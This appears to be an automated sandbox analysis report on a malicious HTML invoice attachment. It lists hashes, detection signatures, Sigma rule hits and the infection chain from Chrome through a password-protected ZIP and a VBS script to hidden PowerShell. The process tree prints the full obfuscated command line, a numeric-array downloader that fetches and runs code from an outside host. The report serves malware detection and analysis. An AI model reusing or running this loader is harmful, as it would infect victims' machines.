Windows
Analysis Report
faktura_FV2025020660849.html
Overview
General Information
Sample name: | faktura_FV2025020660849.html (renamed file extension from htm_ to html) |
Original sample name: | faktura_FV2025020660849.htm_ |
Analysis ID: | 1637352 |
MD5: | 467b6110a70e52f3bee6a6331cd809bd |
SHA1: | 9588dfe44777f409bc74eb61f452c8e8b8feae92 |
SHA256: | a4a49cc9e4542c0b845354a26f3ef4bf69065c120101d8179f512bf7507309d6 |
Infos: | |
Detection
Score: | 96 |
Range: | 0 - 100 |
Confidence: | 100% |
Signatures
System process connects to network (likely due to code injection or exploit)
AI detected suspicious Javascript
Detected javascript redirector / loader
Downloads suspicious files via Chrome
Found suspicious ZIP file
Obfuscated command line found
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
chrome.exe (PID: 6068 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --s tart-maxim ized "abou t:blank" MD5: E81F54E6C1129887AEA47E7D092680BF) chrome.exe (PID: 5756 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" --ty pe=utility --utility -sub-type= network.mo jom.Networ kService - -lang=en-U S --servic e-sandbox- type=none --no-pre-r ead-main-d ll --field -trial-han dle=2060,i ,389514134 7888249468 ,955676745 1129423605 ,262144 -- disable-fe atures=Opt imizationG uideModelD ownloading ,Optimizat ionHints,O ptimizatio nHintsFetc hing,Optim izationTar getPredict ion --vari ations-see d-version= 20250306-1 83004.4290 00 --mojo- platform-c hannel-han dle=2104 / prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF) unarchiver.exe (PID: 6660 cmdline:
"C:\Window s\SysWOW64 \unarchive r.exe" "C: \Users\use r\Download s\faktura_ FV20250206 60849.zip" MD5: 16FF3CC6CC330A08EED70CBC1D35F5D2) 7za.exe (PID: 6720 cmdline:
"C:\Window s\System32 \7za.exe" x -pinfect ed -y -o"C :\Users\us er\AppData \Local\Tem p\gqoox5ke .wxg" "C:\ Users\user \Downloads \faktura_F V202502066 0849.zip" MD5: 77E556CDFDC5C592F5C46DB4127C6F4C) conhost.exe (PID: 6728 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 6792 cmdline:
"cmd.exe" /C "C:\Use rs\user\Ap pData\Loca l\Temp\gqo ox5ke.wxg\ 2025020665 304.vbs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 6800 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) wscript.exe (PID: 6860 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Loc al\Temp\gq oox5ke.wxg \202502066 5304.vbs" MD5: FF00E0480075B095948000BDC66E81F0) cmd.exe (PID: 6216 cmdline:
"C:\Window s\System32 \cmd.exe" /C "echo $ ($uNteWVUN = $('{7}{ 5}{6}' -f $('VJJLWex ieN'.ToCha rArray())) ; $((364,3 12,404,464 ,184,332,4 04,456,472 ,420,396,4 04,320,444 ,420,440,4 64,308,388 ,440,388,4 12,404,456 ,372,232,2 32,332,404 ,456,472,4 04,456,268 ,404,456,4 64,420,408 ,420,396,3 88,464,404 ,344,388,4 32,420,400 ,388,464,4 20,444,440 ,268,388,4 32,432,392 ,388,396,4 28,128,244 ,128,492,1 44,464,456 ,468,404,5 00,236,128 ,144,468,3 04,456,312 ,400,468,2 96,296,448 ,348,128,2 44,128,364 ,332,484,4 60,464,404 ,436,184,3 12,404,464 ,184,288,4 64,464,448 ,348,404,3 92,328,404 ,452,468,4 04,460,464 ,372,232,2 32,268,456 ,404,388,4 64,404,160 ,156,416,4 64,464,448 ,460,232,1 88,188,408 ,420,432,4 04,416,444 ,460,464,2 00,192,192 ,224,224,2 12,184,420 ,440,408,4 44,232,196 ,204,216,2 00,196,188 ,476,404,3 92,212,184 ,448,416,4 48,156,164 ,236,128,1 44,468,304 ,456,312,4 00,468,296 ,296,448,3 48,184,336 ,420,436,4 04,444,468 ,464,128,2 44,128,204 ,192,192,1 92,192,192 ,236,128,1 44,160,364 ,332,484,4 60,464,404 ,436,184,2 92,444,184 ,332,464,4 56,404,388 ,436,328,4 04,388,400 ,404,456,3 72,160,144 ,468,304,4 56,312,400 ,468,296,2 96,448,348 ,184,284,4 04,464,328 ,404,460,4 48,444,440 ,460,404,1 60,164,184 ,284,404,4 64,328,404 ,460,448,4 44,440,460 ,404,332,4 64,456,404 ,388,436,1 60,164,164 ,164,184,3 28,404,388 ,400,336,4 44,276,440 ,400,160,1 64,128,496 ,128,292,2 76,352)^^^ |%{[char]( $_/4)})-jo in'') ^^^| ^^^&($uNt eWVUN) | C :\Windows\ SysWOW64\W indowsPowe rShell\v1. 0\powershe ll.exe -Wi ndow Hidde n -c -" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) conhost.exe (PID: 6780 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) cmd.exe (PID: 5660 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho $($uNte WVUN = $(' {7}{5}{6}' -f $('VJJ LWexieN'.T oCharArray ())); $((3 64,312,404 ,464,184,3 32,404,456 ,472,420,3 96,404,320 ,444,420,4 40,464,308 ,388,440,3 88,412,404 ,456,372,2 32,232,332 ,404,456,4 72,404,456 ,268,404,4 56,464,420 ,408,420,3 96,388,464 ,404,344,3 88,432,420 ,400,388,4 64,420,444 ,440,268,3 88,432,432 ,392,388,3 96,428,128 ,244,128,4 92,144,464 ,456,468,4 04,500,236 ,128,144,4 68,304,456 ,312,400,4 68,296,296 ,448,348,1 28,244,128 ,364,332,4 84,460,464 ,404,436,1 84,312,404 ,464,184,2 88,464,464 ,448,348,4 04,392,328 ,404,452,4 68,404,460 ,464,372,2 32,232,268 ,456,404,3 88,464,404 ,160,156,4 16,464,464 ,448,460,2 32,188,188 ,408,420,4 32,404,416 ,444,460,4 64,200,192 ,192,224,2 24,212,184 ,420,440,4 08,444,232 ,196,204,2 16,200,196 ,188,476,4 04,392,212 ,184,448,4 16,448,156 ,164,236,1 28,144,468 ,304,456,3 12,400,468 ,296,296,4 48,348,184 ,336,420,4 36,404,444 ,468,464,1 28,244,128 ,204,192,1 92,192,192 ,192,236,1 28,144,160 ,364,332,4 84,460,464 ,404,436,1 84,292,444 ,184,332,4 64,456,404 ,388,436,3 28,404,388 ,400,404,4 56,372,160 ,144,468,3 04,456,312 ,400,468,2 96,296,448 ,348,184,2 84,404,464 ,328,404,4 60,448,444 ,440,460,4 04,160,164 ,184,284,4 04,464,328 ,404,460,4 48,444,440 ,460,404,3 32,464,456 ,404,388,4 36,160,164 ,164,164,1 84,328,404 ,388,400,3 36,444,276 ,440,400,1 60,164,128 ,496,128,2 92,276,352 )^|%{[char ]($_/4)})- join'') ^| ^&($uNteW VUN) " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) powershell.exe (PID: 6980 cmdline:
C:\Windows \SysWOW64\ WindowsPow erShell\v1 .0\powersh ell.exe -W indow Hidd en -c - MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
chrome.exe (PID: 6268 cmdline:
"C:\Progra m Files\Go ogle\Chrom e\Applicat ion\chrome .exe" "C:\ Users\user \Desktop\f aktura_FV2 0250206608 49.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
svchost.exe (PID: 6808 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: frack113, Florian Roth: |
Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |